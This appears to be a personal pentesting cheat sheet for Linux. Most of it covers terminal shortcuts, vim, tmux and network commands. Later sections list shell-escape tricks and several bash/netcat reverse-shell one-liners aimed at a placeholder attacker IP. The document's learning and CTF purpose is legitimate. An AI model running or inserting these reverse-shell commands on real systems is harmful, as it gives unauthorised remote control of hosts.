Useful commands and tools for pentest on Linux
Useful shortcuts and hacks to use the terminal quickly
- clear all the current line from the end to the beginning only if the cursor is at the end of the line. It will basically delete everything before the cursor (meaning it can work if you do not want to clear the whole line)Ctrl+Y
- recall the cleared lineCtrl+K
- clear all the current line from the beginning to the end only if the cursor is at the beginning of the line. Which will basically delete everything after the cursor ;) (meaning it can work if you do not want to clear the whole line)Ctrl+W
- clear the previous word in the current line. For example if you have typed a command likegit diff /path/to/some/file
and you want to delete just the last parameter to the command, Ctrl+W is very useful.Ctrl+E Ctrl+U
- move the cursor to the end of the line and clear all the current line from the end to the beginning.Ctrl+C
- cancel the current command line, which implies clear all the current line no matter where the cursor is. (you can't recall the cleared line anymore).Alt+Shift+#
- comment the current line, keep it in the history and bring up your prompt on a new line.Alt+Backspace
to remove a word from your promptCtrl+Shit+C
- copy something you previously selectedCtrl+Shit+V
- paste somethingHome
- Go to the begining of your promptEnd
- Go to the end of your promptTo clear the terminal you can use
but you can also useCRTL+L
to zoom in your terminalCrtl+-
to zoom outIf you have a command typed in your prompt and you want to open it with your default editor you can use
to reverse search in you previously typed commands!cmd
will pull off the last command we used with cmd For example-!cd
will pull off last command we used with cd or!ls
will pull off last command used with ls
Instead of typing
ls -l
you can use the aliasll
Instead of typing
ls -la
you can use the aliasla
If you typed a command but forgot to sudo it you can use
sudo !!
to sudo it. Then using Enter or the down arrow you can read the following lines, whe you are done you can just typeq
If you want to read a file but do not want to scroll if it is big you can use
less FileName
tail FileName
will print for you the last lines of a file
Will sort the content of a file
sort filename
Example of possible result
file1 file2 differ: char 280, line 18
Will compare files
cmp file1 file2
Create an alias
If you have a command you use all the time but that is a little long you can use an alias to make it shorter
alias mycommand="the command you need"
so for examplealias crazyls = "ls -al"
now when you will typecrazyls
you will have the result ofls -al
Network commands
ip a
wireless connectionarp -a
ip n
ip r
get the routing tableping IP-ADD-OR-HOST
check if a host is upnetstat
Pingsweep in bash
On his course Practical Ethical Hacking Heath Adams shares this script that is really convenient to make an ip sweep.
To automate this further we could add an nmap script to run on the alive ip found.
Alternative port scan if nmap unvailable
Here is an internal port Scanner (credits to Tryhackme - Holo network)
Python port scan (credits to Tryhackme - Holo network)
nc -zv 1-65535
read .db file
apt-get install db-util
install db-utilShow everything that’s in the file database.db
db_dump -p database.db
List the databases in the file database.db
db_dump -l database.db
Show only the content of the database mydb in the file database.db
db_dump -p -s mydb database.db
sudo apt install xclip
xclip is a tool that can allow you to get any output in you clipboard. Let's say you have a big input to copy and do not want to mess up with the mouse, you can use xclip.
cat myverybigfile | xclip -sel clipboard
will send the content of myverybigfile to the clipboard
Vi or Vim
Vim is a text editor for writing code or editing linux files.
It can be found preinstalled on many linux systems
vim /path/to/file
open a filei
like insert to enter insert modex
cut chardw
cut worddd
cut lineyw
copy wordyy
copy full linep
to exit insert mode:
enter command mode:1
go to line 1:w
write and save:q
quit but not save:wq
write and quit
Note: it is possible to multiply a command for instance if you want to copy 3 words you can use
Strings will print human readable chars of a file. And for a CTF if we are looking for a specific string we can pipe it to grep
strings -e l file | grep -i FLAG
the-e l
will select the encoding l is for 16-bit littleendianstrings file
is the basic use of the command
"tmux is a terminal multiplexer. It lets you switch easily between several programs in one terminal, detach them (they keep running in the background) and reattach them to a different terminal." Learn more about tmux.
sudo apt install tmux -y
install Tmuxtmux new -s sessionName
create an join a new sessionctrl+b d
detach a sessiontmux ls
list existing sessionsctrl+b x
kill current sessiontmux a -t sessionName
ortmux a -t sessionId
join an existing sessiontmux ctrl+b pageup
to scroll andq
to leave scroll mode
Which architecture
will tell you if you are 32 or 64uname -m
similar but less verbose
Spawning interactive shells
/bin/sh -i
execute the shell interpreter specified in the path in interactive mode (-i).With Perl
perl —e 'exec "/bin/sh";'
or from a scriptperl: exec "/bin/sh";
With Ruby
ruby: exec "/bin/sh"
has to be run from a script
With Lua
lua: os.execute('/bin/sh')
has to be run from a script
With awk
awk 'BEGIN {system("/bin/sh")}'
With Find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.
With vim
vim -c ':!/bin/sh'
Vim Escape
Source HTB Academy
Bash Reverse shell
Say we have a way through root and we need to get a reverse shell here are helpfuls command
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc IP-OF-YOUR-KALI 7777 > /tmp/f
serve a Bash shell on a network socket utilizing a Netcat listener./bin/bash -i >& /dev/tcp/IP-OF-YOUR-KALI/4444 0>&1
nc IP-OF-YOUR-KALI 4444 –e /bin/bash
nc IP-OF-YOUR-KALI 4444 –e /bin/sh
bash -c 'bash -i >& /dev/tcp/IP-OF-YOUR-KALI/4444 0>&1'
this one is symbol safe it is useful when doing it in an url or something like this.
Note: We have to set a listener prior to this with
rlwrap nc -lvp 4444
Here is an amazing website to generate reverse shell there are plenty of options for bash and you can even encode it if you needé
Permissions cheat sheet
Source: Chmod tutorial by Ryan Morrison
Route your scripts through burp
export https_proxy=http://server-ip:port/
for exampleexport https_proxy=
You will need to add a cert
Generate a burp.der cert
Convert it to pem
openssl x509 -inform der -in burp.der -out burp.pem
Install Burp certificate:
cp burp.pem /etc/ssl/certs/
(will need sudo if not root)update-ca-certificates
(will need sudo if not root)cp burp.pem burp.crt
sudo cp burp.crt /usr/local/share/ca-certificates/
sudo cp burp.crt /usr/share/ca-certificates/
Everytime you launch a script you should see the traffic in burp
Last updated